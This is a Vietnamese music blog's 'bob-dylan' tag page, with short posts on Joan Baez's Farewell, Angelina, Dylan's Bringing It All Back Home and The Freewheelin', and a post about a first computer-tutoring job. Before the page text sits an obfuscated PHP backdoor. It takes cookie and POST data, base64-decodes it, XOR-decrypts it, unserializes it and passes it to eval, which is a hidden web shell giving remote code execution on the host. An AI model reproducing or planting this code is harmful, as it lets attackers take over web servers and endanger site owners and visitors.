$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> bob-dylan – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: bob-dylan

Joan Baez ‎– Farewell, Angelina

Farewell, Angelina là ca khúc được viết bởi Bob Dylan, vốn ban đầu cho album Bringing It All Back Home của ông, nhưng không hiểu sao chỉ sau một lần thu âm ông không thích nữa. Ca khúc này sau trở thành bài tủ của Joan Baez, và album này cũng là một trong những album hay nhất của bà.

Chuyện của Bob Dylan và Joan Baez cũng hay ho, ngồi lai rai chắc kể cũng được khá. Mà thôi, để sau.

Album này nhìn chung có nhiều ca khúc mà mình rất thích. Những ca khúc như It’s All Over Now, Baby Blue hay Daddy, You Been On My Mind, Colours đều hay không kém gì Farewell, Angelina dù có thể không nổi bằng. Giọng của Joan Baez như có một thứ ma lực cuốn hút người nghe đặt cả tâm hồn mình vào ca khúc…

Farewell, Angelina
The sky is on fire
And I must go.

Bob Dylan – Bringing It All Back Home

Bringing It All Back Home là album thứ hai của Bob Dylan mà mình có. Đúng ra, đây không hẳn là album của Bob mà mình thích nhất, nhưng là một trong những album quan trọng và đặc biệt của Bob mà mình muốn sở hữu. Chỉ thế.

Không có những bài đẹp và thanh bình như tranh vẽ, xen lẫn tinh thần phản chiến và ủng hộ các phong trào xã hội ở các album trước, Bringing It Back Home cho thấy một Bob Dylan khác – một Bob Dylan như ở một thế giới khác. Âm nhạc của ông đi dần theo chủ nghĩa siêu thực. Có một câu chuyện thú vị, là trong khoảng thời gian này, Bob Dylan lần đầu hội kiến The Beatles – hai cái tên hay được thính giả đặt lên bàn cân so sánh. Và như kể lại, Bob Dylan đã lần đầu giới thiệu The Beatles đến với thế giới diệu kì của cần sa và thuốc phiện. Ừ, và có vẻ những album sau này của cả Bob Dylan lẫn The Fab Four cũng kì diệu như thế.

Mà thôi, hãy trở lại với Bringing It All Back Home.

Nhiều người xem đây không chỉ là album hay nhất của Bob Dylan mà còn là album hay nhất trong lịch sử nhạc rock. Cả hai vế đều có chỗ đúng hay chỗ sai tuỳ theo từng người. Không phải cái thứ nhạc pha trộn tài tình giữa chất folk kể chuyện đặc trưng từ đó giờ, với chút gì đó từ Chuck Berry (đặc biệt là ở những câu guitar trong bài hát mở màn Subterranean Homesick Blues) làm nên điểm đặc biệt trong album; mà là khả năng tưởng tượng không có giới hạn, thả lỏng mình theo âm nhạc xuyên suốt album mới khiến nó được đánh giá cao.

Không còn một Bob Dylan quan tâm đến phản chiến, đến hoạt động nhân quyền, chỉ còn một Bob Dylan bay bổng theo âm nhạc.

Thế thôi, có lẽ nói về Bringing It All Back Home thế thôi là đủ. Có những loại nhạc, phải tận tai nghe mới cảm nhận thấy khác được. Tin mình đi.

Bob Dylan – The Freewheelin’ Bob Dylan

Bob Dylan, có lẽ trong cả chiều dài lịch sử mấy trăm năm của âm nhạc thế giới từ xưa đến nay, hiếm kiếm được tính cách nào như ông. Với mình, Bob Dylan là người viết và kể chuyện xuất sắc nhất.

Bài viết này chỉ nhằm nêu lên cảm nhận ngắn của mình về record The Freewheelin’ Bob Dylan mà mình có, nên xin phép không đi quá sâu để nói về tiểu sử của ông. Record này là một trong những record ‘có giá trị’ đầu tiên mà mình bỏ tiền mua, chỉ vì thích quá và không thể chờ ôm cây đợi thỏ đi thrift store cho tới khi nào thấy được.

Mình đánh giá The Freewheelin’ Bob Dylan là album thuộc loại hay nhất của Bob. Có những bài trong album này đã đi cùng mình qua suốt những tháng năm đẹp và nhiều suy tư, mộng ảo nhất của tuổi trẻ. Từ Blowin’ In The Wind như là bản tuyên ngôn của thanh thiếu niên thập niên 60, cho tới Girl Of The North Country đã an ủi tâm hồn mình sau cuộc tình đổ vỡ với một cô gái, à, đến từ miền Bắc. Đây là album thứ hai được thu âm của Bob, và ngạc nhiên thay, nó đánh dấu một sự thay đổi rất lớn của ông so với album đầu tay. Nó mở ra một giai đoạn mà cả nước Mỹ ngỡ ngàng trước khả năng sáng tác và diễn hát như gió thổi mây trôi, liền mạch như một nhà thơ đang kể chuyện của ông. Những bài hát của ông, đó là nhạc, đó là chuyện, và đó là thơ.

Năm đó, Bob Dylan mới được 22.

Bìa record cũng đẹp thật lạ. Đó là hình Bob Dylan cùng cô bạn gái Suze Rotolo chụp ở một góc đường thành phố New York – rất gần với căn hộ của cặp đôi này, vào một ngày tháng 2 năm 1963. Hình ảnh chàng trai trẻ khẽ nhướng vai lên, nhìn khá bình thản, và bên cạnh là cô gái tươi tắn nép sát vào tay cậu ta, đã như trở thành biểu tượng. Không hiểu sao, có điều gì đó ở bìa record này khiến mình thấy yên bình và đẹp nghệ thuật đến lạ.

Một record mà những bài hát đã vượt lên đạt tầm vĩ đại, mà ảnh bìa cũng trở thành một trong những hình ảnh có tính biểu tượng cực cao, theo mình là một record xứng để đưa vào bộ sưu tập.

Lần đầu làm gia sư

Hôm qua là lần đầu tiên mình đi “làm gia sư”. Mọi việc đến cũng thật tình cờ khi mình dạo trang rao vặt và thấy một ông đăng cần người dạy kèm cho con trai ổng về máy tính. Chỗ này chỉ cách nhà mình có 5 phút chạy xe, nên mình cũng quyết định thử. Sau tầm nửa tiếng nói chuyện với mình, thì ông ấy đồng ý để mình kèm quý tử vài tiếng. Quý tử của ổng đang học năm 2 đại học, chuyên ngành business, nhưng trong tương lai sẽ tiếp quản công ty của ổng chuyên về công nghệ, nên muốn biết thêm về cách setup site này nọ, sau này có gì còn có thể quản lý.
Thế là mình lẽo đẽo tới dạy cậu ấy sau giờ làm. Nhìn chung hướng dẫn một người hoàn toàn không có background gì về công nghệ biết cách thiết lập một site hoàn chỉnh trong vài tiếng đồng hồ tưởng dễ mà không phải dễ. Tất cả mọi thứ từ việc xài FTP Client thế nào, đăng nhập vào cpanel ra sao, tạo database và upload chạy file cài đặt thế nào… đều phải chỉ tường tận. Ban đầu mình cũng hơi nghi ngờ lo rằng liệu mình sẽ chỉ cậu ta được không, vì thật ra giao tiếp của mình không trôi chảy, nói chuyện bình thường còn khó nghe nữa nói gì giảng dạy, nhưng mà mọi việc cũng tiến triển khá tốt.
Như thoả thuận ban đầu, mình chỉ cậu ta cơ bản xong trong vòng 4 tiếng, sau này nếu cậu ta có nhu cầu học nâng cao hơn thì họ sẽ cân nhắc liên lạc mình sau. Nhận cái check $160 cho 4 tiếng dạy thêm mà mình hí hửng ra phết. Vì cái gì lần đầu tiên chả quý, lần đầu tiên chỉ dạy kiến thức cho một ai đó, dù là cơ bản cũng thấy hơi hơi hơi hơi tự hào.
Thế là mình tự thưởng cho mình 2 đĩa than mà mình thích nhất của Bob Dylan để đánh dấu dịp này. Giờ đang ngồi hí hoáy làm thêm cho một dự án cá nhân, nghe Bob thổi harmonica và thủ thỉ

How many roads must a man walk down
Before you call him a man?

bỗng chợt thấy yêu đời phết.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.